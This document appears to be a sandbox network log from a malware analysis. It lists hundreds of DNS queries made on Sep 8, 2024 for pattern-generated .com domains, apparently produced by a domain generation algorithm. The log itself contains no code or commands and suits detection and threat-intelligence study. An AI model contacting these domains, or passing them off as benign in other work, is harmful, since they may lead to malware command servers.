                                                                                                                                                                                                          Sep 8, 2024 10:53:41.794090986 CEST192.168.2.91.1.1.10xe8e3Standard query (0)lyryfox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.794130087 CEST192.168.2.91.1.1.10xc5b7Standard query (0)gadyfob.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.937956095 CEST192.168.2.91.1.1.10xb1afStandard query (0)qexyriq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.942694902 CEST192.168.2.91.1.1.10x6b9dStandard query (0)gahyhys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.943057060 CEST192.168.2.91.1.1.10xb6c0Standard query (0)lyryvur.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.943124056 CEST192.168.2.91.1.1.10x726fStandard query (0)vocyrom.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.943510056 CEST192.168.2.91.1.1.10x179eStandard query (0)qegyhev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.943809032 CEST192.168.2.91.1.1.10x7fbfStandard query (0)vowycut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.943974972 CEST192.168.2.91.1.1.10xbc0bStandard query (0)purycul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.944232941 CEST192.168.2.91.1.1.10x9234Standard query (0)volyquk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.944423914 CEST192.168.2.91.1.1.10x3c68Standard query (0)pufygav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.944588900 CEST192.168.2.91.1.1.10xdc09Standard query (0)gaqycyz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.944741011 CEST192.168.2.91.1.1.10xd453Standard query (0)qeqyxyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.944894075 CEST192.168.2.91.1.1.10x640Standard query (0)lyxywij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.951570988 CEST192.168.2.91.1.1.10xd85cStandard query (0)vofygaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.953840017 CEST192.168.2.91.1.1.10xd0ecStandard query (0)puvytag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:41.978420973 CEST192.168.2.91.1.1.10x3d0dStandard query (0)lygyged.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:42.015791893 CEST192.168.2.91.1.1.10xdc5dStandard query (0)gacyroh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.027020931 CEST192.168.2.91.1.1.10x1108Standard query (0)lygynox.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.030112028 CEST192.168.2.91.1.1.10xff36Standard query (0)qexykug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.032486916 CEST192.168.2.91.1.1.10x4539Standard query (0)gahynaz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.033148050 CEST192.168.2.91.1.1.10xbca2Standard query (0)vowypek.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.034563065 CEST192.168.2.91.1.1.10x9970Standard query (0)lyrysyj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.038388014 CEST192.168.2.91.1.1.10x9de4Standard query (0)puvyliv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.059721947 CEST192.168.2.91.1.1.10x610cStandard query (0)lyvylod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.060676098 CEST192.168.2.91.1.1.10x5321Standard query (0)gacykub.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.060894012 CEST192.168.2.91.1.1.10xc6edStandard query (0)qegynap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.077984095 CEST192.168.2.91.1.1.10xbeb8Standard query (0)gahyfow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.079464912 CEST192.168.2.91.1.1.10x38ddStandard query (0)qetyxeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.079714060 CEST192.168.2.91.1.1.10x4b2bStandard query (0)qekyqyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.082422972 CEST192.168.2.91.1.1.10xeeccStandard query (0)vojygok.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.084709883 CEST192.168.2.91.1.1.10xbd9dStandard query (0)lyvywux.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.085165977 CEST192.168.2.91.1.1.10x134fStandard query (0)gatycyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.090972900 CEST192.168.2.91.1.1.10x2fd2Standard query (0)vopycyf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.092015028 CEST192.168.2.91.1.1.10xfe5cStandard query (0)lykygaj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.092721939 CEST192.168.2.91.1.1.10x3d35Standard query (0)volyjym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.094033957 CEST192.168.2.91.1.1.10xa598Standard query (0)pumytol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.094780922 CEST192.168.2.91.1.1.10xee1bStandard query (0)qebyrip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.097090006 CEST192.168.2.91.1.1.10xf476Standard query (0)puzyjyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.097922087 CEST192.168.2.91.1.1.10x87afStandard query (0)lysyvud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.098946095 CEST192.168.2.91.1.1.10xa1bfStandard query (0)puzymev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.099231958 CEST192.168.2.91.1.1.10x3f67Standard query (0)lymylij.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.101521015 CEST192.168.2.91.1.1.10xd7aaStandard query (0)galyheh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.130172968 CEST192.168.2.91.1.1.10x9d10Standard query (0)vofydut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.130369902 CEST192.168.2.91.1.1.10xa500Standard query (0)pujygaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.131953001 CEST192.168.2.91.1.1.10xabbStandard query (0)puryxag.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.132405043 CEST192.168.2.91.1.1.10x72edStandard query (0)gadyduz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.135225058 CEST192.168.2.91.1.1.10x3f2fStandard query (0)pupycuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.137142897 CEST192.168.2.91.1.1.10x870eStandard query (0)qeqytal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.138829947 CEST192.168.2.91.1.1.10x4dfStandard query (0)qexyqyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.139086008 CEST192.168.2.91.1.1.10xd25cStandard query (0)vowyzam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.139246941 CEST192.168.2.91.1.1.10x48b7Standard query (0)vonyrot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.139385939 CEST192.168.2.91.1.1.10xe82dStandard query (0)qedyvuv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.156316042 CEST192.168.2.91.1.1.10xa25Standard query (0)puvywup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.157191992 CEST192.168.2.91.1.1.10xe576Standard query (0)qegyfil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.157380104 CEST192.168.2.91.1.1.10x7c66Standard query (0)pufydul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.157807112 CEST192.168.2.91.1.1.10x3492Standard query (0)qekyheq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.158366919 CEST192.168.2.91.1.1.10xf24fStandard query (0)qetysuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.158845901 CEST192.168.2.91.1.1.10x4771Standard query (0)lyryxen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.159035921 CEST192.168.2.91.1.1.10x4d86Standard query (0)vocyquc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.159260035 CEST192.168.2.91.1.1.10xa9eStandard query (0)ganyriz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.159410954 CEST192.168.2.91.1.1.10xb033Standard query (0)gacyqys.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.159555912 CEST192.168.2.91.1.1.10xbaa1Standard query (0)gadyvis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.160043955 CEST192.168.2.91.1.1.10x7b6bStandard query (0)pupydig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.160351038 CEST192.168.2.91.1.1.10x8d30Standard query (0)vocykif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.177867889 CEST192.168.2.91.1.1.10x5cffStandard query (0)qeqyloq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.178421974 CEST192.168.2.91.1.1.10xa6f3Standard query (0)lygyfir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.178488016 CEST192.168.2.91.1.1.10x2cbcStandard query (0)vopydum.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.178704977 CEST192.168.2.91.1.1.10x387eStandard query (0)lykymyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.178833008 CEST192.168.2.91.1.1.10xab00Standard query (0)pufybop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179001093 CEST192.168.2.91.1.1.10x8fdaStandard query (0)gaqypew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179073095 CEST192.168.2.91.1.1.10xd29Standard query (0)lymytar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179263115 CEST192.168.2.91.1.1.10x62e5Standard query (0)ganyzas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179282904 CEST192.168.2.91.1.1.10x7002Standard query (0)gatyduh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179459095 CEST192.168.2.91.1.1.10xf2e5Standard query (0)vojymet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179594994 CEST192.168.2.91.1.1.10x6aaaStandard query (0)qebylov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.179836988 CEST192.168.2.91.1.1.10x420Standard query (0)lyxyjun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.184842110 CEST192.168.2.91.1.1.10x7182Standard query (0)vofybic.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.194228888 CEST192.168.2.91.1.1.10x5daeStandard query (0)purypyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.196108103 CEST192.168.2.91.1.1.10x9c3aStandard query (0)gaqyzoh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.197174072 CEST192.168.2.91.1.1.10xcf2cStandard query (0)lyxymed.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:43.197398901 CEST192.168.2.91.1.1.10x92f9Standard query (0)pujymel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.706199884 CEST192.168.2.91.1.1.10xddd4Standard query (0)pupypep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.707220078 CEST192.168.2.91.1.1.10x9628Standard query (0)qeqyrug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.707387924 CEST192.168.2.91.1.1.10x20a2Standard query (0)vonyqym.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.708118916 CEST192.168.2.91.1.1.10x72bbStandard query (0)lymywun.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.717547894 CEST192.168.2.91.1.1.10x66d0Standard query (0)gadycew.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.718286037 CEST192.168.2.91.1.1.10x73c3Standard query (0)volygoc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.725157022 CEST192.168.2.91.1.1.10xc184Standard query (0)lysyxar.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.726422071 CEST192.168.2.91.1.1.10xa520Standard query (0)galyfis.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.727197886 CEST192.168.2.91.1.1.10x8eceStandard query (0)qedyxel.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.727377892 CEST192.168.2.91.1.1.10xcc74Standard query (0)pumywug.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.728106022 CEST192.168.2.91.1.1.10x5faStandard query (0)puzygop.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.728950024 CEST192.168.2.91.1.1.10xf7f2Standard query (0)volymaf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.729809999 CEST192.168.2.91.1.1.10xa050Standard query (0)galynab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.729978085 CEST192.168.2.91.1.1.10x41cdStandard query (0)qedysyp.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.730957985 CEST192.168.2.91.1.1.10xecaaStandard query (0)vofycyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.738656044 CEST192.168.2.91.1.1.10xcd2Standard query (0)lyxygax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.745635033 CEST192.168.2.91.1.1.10x6441Standard query (0)vopypec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.748229027 CEST192.168.2.91.1.1.10xf90Standard query (0)pufycyq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.748595953 CEST192.168.2.91.1.1.10x2ff9Standard query (0)gaqykus.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.754071951 CEST192.168.2.91.1.1.10x56c1Standard query (0)lykyfud.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.762171984 CEST192.168.2.91.1.1.10xf361Standard query (0)pufypeg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.763168097 CEST192.168.2.91.1.1.10x5a1cStandard query (0)vocyjet.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.763835907 CEST192.168.2.91.1.1.10x7c85Standard query (0)purytov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.768435001 CEST192.168.2.91.1.1.10xbbd8Standard query (0)qekyfiv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.768810034 CEST192.168.2.91.1.1.10x244aStandard query (0)pupyxal.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.769068956 CEST192.168.2.91.1.1.10x45acStandard query (0)gahyvuh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.769462109 CEST192.168.2.91.1.1.10x10abStandard query (0)lyrytod.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.770251989 CEST192.168.2.91.1.1.10x99bcStandard query (0)vonykuk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.770901918 CEST192.168.2.91.1.1.10x7c55Standard query (0)ganykuw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.771194935 CEST192.168.2.91.1.1.10x37a4Standard query (0)pumyliq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.781676054 CEST192.168.2.91.1.1.10xe80dStandard query (0)vojybim.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.784060001 CEST192.168.2.91.1.1.10x41daStandard query (0)lykynon.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.784507036 CEST192.168.2.91.1.1.10x3954Standard query (0)qegyvuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.784697056 CEST192.168.2.91.1.1.10xae6fStandard query (0)qebykul.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.784871101 CEST192.168.2.91.1.1.10x642bStandard query (0)lyvyjyr.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.785022974 CEST192.168.2.91.1.1.10xa59bStandard query (0)puvyjyl.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.785310030 CEST192.168.2.91.1.1.10xd250Standard query (0)gacyhez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.785538912 CEST192.168.2.91.1.1.10x3728Standard query (0)pujybig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.785872936 CEST192.168.2.91.1.1.10x4bb4Standard query (0)ganyqyh.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.785962105 CEST192.168.2.91.1.1.10x7de3Standard query (0)gatypas.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.786175013 CEST192.168.2.91.1.1.10xdbabStandard query (0)qetytav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.786993980 CEST192.168.2.91.1.1.10x36c1Standard query (0)lysysyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.787384033 CEST192.168.2.91.1.1.10xcc8cStandard query (0)qekynog.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.787559032 CEST192.168.2.91.1.1.10x2405Standard query (0)lygyvuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.792016983 CEST192.168.2.91.1.1.10x3616Standard query (0)gaqyrib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.792342901 CEST192.168.2.91.1.1.10xdb01Standard query (0)qexyhap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.804166079 CEST192.168.2.91.1.1.10x240bStandard query (0)qegysyg.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.805393934 CEST192.168.2.91.1.1.10xb0a1Standard query (0)vowykuc.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.808950901 CEST192.168.2.91.1.1.10x8c29Standard query (0)vowyrif.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.809335947 CEST192.168.2.91.1.1.10xca60Standard query (0)lygysen.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.809896946 CEST192.168.2.91.1.1.10xd495Standard query (0)qexynol.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.829406023 CEST192.168.2.91.1.1.10xf9beStandard query (0)qetylip.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:44.829878092 CEST192.168.2.91.1.1.10x9660Standard query (0)gacynow.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.066757917 CEST192.168.2.91.1.1.10xc87bStandard query (0)gatyzoz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.066914082 CEST192.168.2.91.1.1.10x3dd3Standard query (0)qebyqeq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.070677996 CEST192.168.2.91.1.1.10x554aStandard query (0)vocymak.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.128993034 CEST192.168.2.91.1.1.10x55f6Standard query (0)puvymaq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.131289959 CEST192.168.2.91.1.1.10xfb2aStandard query (0)purylup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.131616116 CEST192.168.2.91.1.1.10xc701Standard query (0)vojyduf.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.131755114 CEST192.168.2.91.1.1.10x5b79Standard query (0)gahydyb.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.131812096 CEST192.168.2.91.1.1.10xa301Standard query (0)pujyduv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.132337093 CEST192.168.2.91.1.1.10x1c6aStandard query (0)lyrylix.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.159001112 CEST192.168.2.91.1.1.10x73e5Standard query (0)lyvymej.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:45.209645033 CEST192.168.2.91.1.1.10xdab8Standard query (0)vopyzot.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.599757910 CEST192.168.2.91.1.1.10xcbcbStandard query (0)puzybil.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.599981070 CEST192.168.2.91.1.1.10x4febStandard query (0)gadypah.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.600287914 CEST192.168.2.91.1.1.10x483cStandard query (0)volybut.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.600493908 CEST192.168.2.91.1.1.10x5f04Standard query (0)qeqykyv.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.601454020 CEST192.168.2.91.1.1.10x2026Standard query (0)lykyvyx.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.601651907 CEST192.168.2.91.1.1.10xf42fStandard query (0)lyxynir.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.602835894 CEST192.168.2.91.1.1.10xa3d5Standard query (0)vofypam.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.602883101 CEST192.168.2.91.1.1.10x9202Standard query (0)lymyjyd.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.604279995 CEST192.168.2.91.1.1.10x1e20Standard query (0)vojycec.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.604640007 CEST192.168.2.91.1.1.10x5bStandard query (0)qekyvup.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.604839087 CEST192.168.2.91.1.1.10xd8ecStandard query (0)galyvuz.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.605135918 CEST192.168.2.91.1.1.10x852dStandard query (0)qedytoq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.605325937 CEST192.168.2.91.1.1.10xc2e9Standard query (0)pumyjev.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.605648041 CEST192.168.2.91.1.1.10x4da6Standard query (0)lysytoj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.606195927 CEST192.168.2.91.1.1.10x2766Standard query (0)qegyxav.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.606792927 CEST192.168.2.91.1.1.10x14dStandard query (0)ganyhab.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.606976032 CEST192.168.2.91.1.1.10x82cdStandard query (0)pupytiq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.607399940 CEST192.168.2.91.1.1.10xc62fStandard query (0)vonyjef.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.608011007 CEST192.168.2.91.1.1.10x39bcStandard query (0)gacyfih.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.609635115 CEST192.168.2.91.1.1.10x6cf0Standard query (0)vowyqyt.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.610791922 CEST192.168.2.91.1.1.10x453Standard query (0)pufyxov.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.611567020 CEST192.168.2.91.1.1.10x6286Standard query (0)qexyfuq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.619385958 CEST192.168.2.91.1.1.10xa510Standard query (0)lyxyfuj.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.621480942 CEST192.168.2.91.1.1.10x4357Standard query (0)gadyzib.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.626391888 CEST192.168.2.91.1.1.10x1f4dStandard query (0)qedylig.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.626589060 CEST192.168.2.91.1.1.10xb97cStandard query (0)pumymap.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.626760006 CEST192.168.2.91.1.1.10x591dStandard query (0)galydyw.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.628041983 CEST192.168.2.91.1.1.10x9749Standard query (0)volydyk.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.631127119 CEST192.168.2.91.1.1.10xd1f6Standard query (0)lymymax.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.631472111 CEST192.168.2.91.1.1.10x7ef5Standard query (0)gaqyqez.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.631838083 CEST192.168.2.91.1.1.10xaa75Standard query (0)vofyzof.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.632594109 CEST192.168.2.91.1.1.10x6099Standard query (0)qeqyqep.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.634030104 CEST192.168.2.91.1.1.10x9542Standard query (0)puzyduq.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.639143944 CEST192.168.2.91.1.1.10x2648Standard query (0)ganynos.comA (IP address)IN (0x0001)false
                                                                                                                                                                                                          Sep 8, 2024 10:53:46.646266937 CEST192.168.2.91.1.1.10x117aStandard query (0)qekysel.comA (IP address)IN (0x0001)false
